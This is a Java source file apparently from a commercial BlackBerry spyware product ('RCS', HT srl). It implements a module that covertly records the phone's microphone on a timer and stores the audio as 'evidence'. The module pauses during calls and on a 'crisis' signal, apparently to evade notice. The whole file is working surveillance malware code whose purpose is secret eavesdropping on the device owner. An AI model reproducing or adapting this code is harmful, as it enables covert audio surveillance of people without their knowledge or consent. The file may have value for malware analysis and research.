
/* *************************************************
 * Copyright (c) 2010 - 2010
 * HT srl,   All rights reserved.
 * Project      : RCS, RCSBlackBerry
 * Package      : blackberry.agent
 * File         : MicAgent.java
 * Created      : 28-apr-2010
 * *************************************************/
package blackberry.module;

import net.rim.blackberry.api.phone.Phone;
import net.rim.blackberry.api.phone.PhoneListener;
import net.rim.device.api.util.DataBuffer;
import blackberry.Messages;
import blackberry.Status;
import blackberry.config.ConfModule;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.Evidence;
import blackberry.evidence.EvidenceType;
import blackberry.fs.Path;
import blackberry.manager.ModuleManager;
import blackberry.record.AudioRecorder;
import blackberry.utils.DateTime;
import blackberry.utils.Utils;

/**
 * The Class MicAgent.
 */
public final class ModuleMic extends BaseModule implements PhoneListener {




    private static final long MIC_PERIOD = 5000;

    private final int STOPPED = 0;
    private final int STARTED = 1;
    private final int SUSPENDED = 2;

    static final int amr_sizes[] = { 12, 13, 15, 17, 19, 20, 26, 31, 5, 6, 5,
            5, 0, 0, 0, 0 };

    //AudioRecorderDispatcher recorder;
    long fId;

    //boolean suspended = false;
    int state;
    Object stateLock = new Object();

    private AudioRecorder recorder;
    int numFailures;

    public static String getStaticType() {
        return Messages.getString("15.0"); //$NON-NLS-1$
    }

    public static ModuleMic getInstance() {
        return (ModuleMic) ModuleManager.getInstance().get(getStaticType());
    }

    public boolean parse(ConfModule conf) {
        setPeriod(MIC_PERIOD);
        setDelay(MIC_PERIOD);
        state = STOPPED;
        return true;
    }

    public void actualStart() {




        synchronized (stateLock) {
            if (state != STARTED) {
                Phone.addPhoneListener(this);




                startRecorder();





            }

            state = STARTED;
        }

    }

    public void actualStop() {




        synchronized (stateLock) {
            if (state == STARTED) {
                Phone.removePhoneListener(this);




                saveRecorderEvidence();
                stopRecorder();
            }
            state = STOPPED;

        }




    }

    private void newState(int newstate) {
        synchronized (stateLock) {
            state = newstate;
        }
    }

    public void crisis(boolean value) {
        if (value) {



            suspend();
        } else {



            resume();
        }
    }

    synchronized void startRecorder() {




        final DateTime dateTime = new DateTime();
        fId = dateTime.getFiledate();

        recorder = new AudioRecorder();
        recorder.start();





        if (Status.self().wantLight()) {
            Debug.ledStart(Debug.COLOR_BLUE_LIGHT);
        }

        numFailures = 0;
    }

    synchronized void stopRecorder() {




        if (recorder == null) {



            return;
        }





        recorder.stop();
        if (Status.self().wantLight()) {
            Debug.ledStop();
        }
    }

    /*
     * (non-Javadoc)
     * @see blackberry.threadpool.TimerJob#actualRun()
     */
    public void actualLoop() {




        synchronized (stateLock) {
            if (state == STARTED) {

                if (numFailures < 10) {
                    saveRecorderEvidence();
                } else {




                    suspend();
                }

                if (status.callInAction()) {



                    suspend();

                } else if (Status.getInstance().crisisMic()) {



                    suspend();
                }
            }
        }
    }

    private synchronized void saveRecorderEvidence() {




        final byte[] chunk = recorder.getAvailable();

        if (chunk != null && chunk.length > 0) {

            Evidence evidence = new Evidence(EvidenceType.MIC);




            int offset = 0;
            if (Utils.equals(chunk, 0, AudioRecorder.AMR_HEADER, 0,
                    AudioRecorder.AMR_HEADER.length)) {
                offset = AudioRecorder.AMR_HEADER.length;
            }








            evidence.createEvidence(getAdditionalData());



            evidence.writeEvidence(chunk, offset);
            evidence.close();
        } else {



            numFailures += 1;
        }
    }

    private byte[] getAdditionalData() {
        final int LOG_MIC_VERSION = 2008121901;
        // LOG_AUDIO_CODEC_SPEEX   0x00;
        final int LOG_AUDIO_CODEC_AMR = 0x01;
        final int sampleRate = 8000;

        final int tlen = 16;
        final byte[] additionalData = new byte[tlen];

        final DataBuffer databuffer = new DataBuffer(additionalData, 0, tlen,
                false);

        databuffer.writeInt(LOG_MIC_VERSION);
        databuffer.writeInt(sampleRate | LOG_AUDIO_CODEC_AMR);
        databuffer.writeLong(fId);





        return additionalData;
    }

    /**
     * Suspend recording
     */
    private void suspend() {
        synchronized (stateLock) {
            if (state == STARTED) {



                stopRecorder();
                state = SUSPENDED;
            } else {



            }
        }
    }

    private void resume() {
        synchronized (stateLock) {
            if (state == SUSPENDED && !Status.getInstance().callInAction()
                    && !Status.getInstance().crisisMic()) {



                startRecorder();
                state = STARTED;
            } else {



            }
        }
    }

    public void callIncoming(int callId) {
        init();





        final ModuleMic agent = (ModuleMic) ModuleMic.getInstance();
        agent.suspend();
    }

    public void callInitiated(int callid) {
        init();




        final ModuleMic agent = (ModuleMic) ModuleMic.getInstance();
        agent.suspend();
    }

    public void callDisconnected(int callId) {
        init();




        final ModuleMic agent = (ModuleMic) ModuleMic.getInstance();
        agent.resume();
    }

    public void callAdded(int callId) {

    }

    public void callAnswered(int callId) {

    }

    public void callConferenceCallEstablished(int callId) {

    }

    public void callConnected(int callId) {

    }

    public void callDirectConnectConnected(int callId) {

    }

    public void callDirectConnectDisconnected(int callId) {

    }

    public void callEndedByUser(int callId) {

    }

    public void callFailed(int callId, int reason) {

    }

    public void callHeld(int callId) {

    }

    public void callRemoved(int callId) {

    }

    public void callResumed(int callId) {

    }

    public void callWaiting(int callid) {

    }

    public void conferenceCallDisconnected(int callId) {

    }

    private synchronized void init() {
        if (!Path.isInizialized()) {
            Path.makeDirs();
        }
        Debug.init();
    }
}
